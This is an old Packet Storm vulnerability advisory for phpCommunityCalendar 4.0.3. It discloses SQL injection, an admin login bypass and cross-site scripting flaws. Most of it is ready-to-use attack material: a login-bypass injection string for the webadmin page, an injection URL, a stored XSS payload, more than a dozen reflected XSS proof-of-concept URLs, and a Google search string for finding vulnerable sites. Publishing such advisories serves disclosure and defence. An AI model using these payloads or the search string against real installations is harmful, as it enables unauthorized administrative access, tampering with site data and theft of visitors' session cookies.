phpcal.txt

2005-09-07T00:00:00
ID PACKETSTORM:39859
Type packetstorm
Reporter rgod
Modified 2005-09-07T00:00:00

Description

                                        
                                            `phpCommunityCalendar 4.0.3 (possibly prior versions)  
sql injection / login bypass / cross site scripting  
  
software:  
site: http://open.appideas.com  
download: http://open.appideas.com/Calendar/  
  
1) sql injection / login bypass:  
"admin" directory contains tools for the site administrator. "webadmin" contains tools for category  
administrators. If magic quotes off a user can bypass category admin check modifying sql login query, example:  
go to http://[target]/[path]/webadmin/login.php and use this:  
  
login: ' or isnull(1/0) /*  
password: [nothing here]  
  
now you can add, delete, modify events  
  
  
2) sql injection:  
  
http://[target]/[path]/week.php?LocationID=-1'[INJECTION]%20/*  
  
3) "admin" directory should be password protected by .htaccess , if not you can  
go to control panel as main admin  
  
http://[target]/[path]/admin/  
  
  
4) cross site scripting, poc:  
  
4.1) add an event and fill some fields with this:  
  
\'\);</script><script>alert(document.cookie)</script>  
  
4.2) check this urls:  
  
http://[target]/[path]/thankyou.php?LocationID="><script>alert('LOL')</script>  
http://[target]/[path]/calDaily.php?font="><script>alert('LOL')</script><"  
http://[target]/[path]/calMonthly.php?font="><script>alert('LOL')</script><"  
http://[target]/[path]/calMonthlyP.php?font="><script>alert('LOL')</script><"  
http://[target]/[path]/calWeekly.php?font="><script>alert('LOL')</script><"  
http://[target]/[path]/calWeeklyP.php?font="><script>alert('LOL')</script><"  
http://[target]/[path]/calYearly.php?font="><script>alert('LOL')</script><"  
http://[target]/[path]/calYearlyP.php?font="><script>alert('LOL')</script><"  
http://[target]/[path]/day.php?font="><script>alert('LOL')</script><!--  
http://[target]/[path]/day.php?LocationID="><script>alert('LOL')</script><!--  
http://[target]/[path]/event.php?font="><script>alert('LOL')</script>  
http://[target]/[path]/event.php?CeTi=</title><script>alert('LOL')</script>  
http://[target]/[path]/event.php?Contact=<script>alert('LOL')</script>  
http://[target]/[path]/event.php?Description=<script>alert('LOL')</script>  
http://[target]/[path]/event.php?ShowAddress=<script>alert('LOL')</script>  
http://[target]/[path]/week.php?font="><script>alert('LOL')</script>  
  
and so on... (a lot of uninitizialized vars showned)  
  
  
googledork: "Calendar programming by AppIdeas.com" filetype:php  
  
rgod  
site: http://rgod.altervista.org  
mail: retrogod@aliceposta.it  
  
original advisory: http://www.rgod.altervista.org/phpccal.html  
`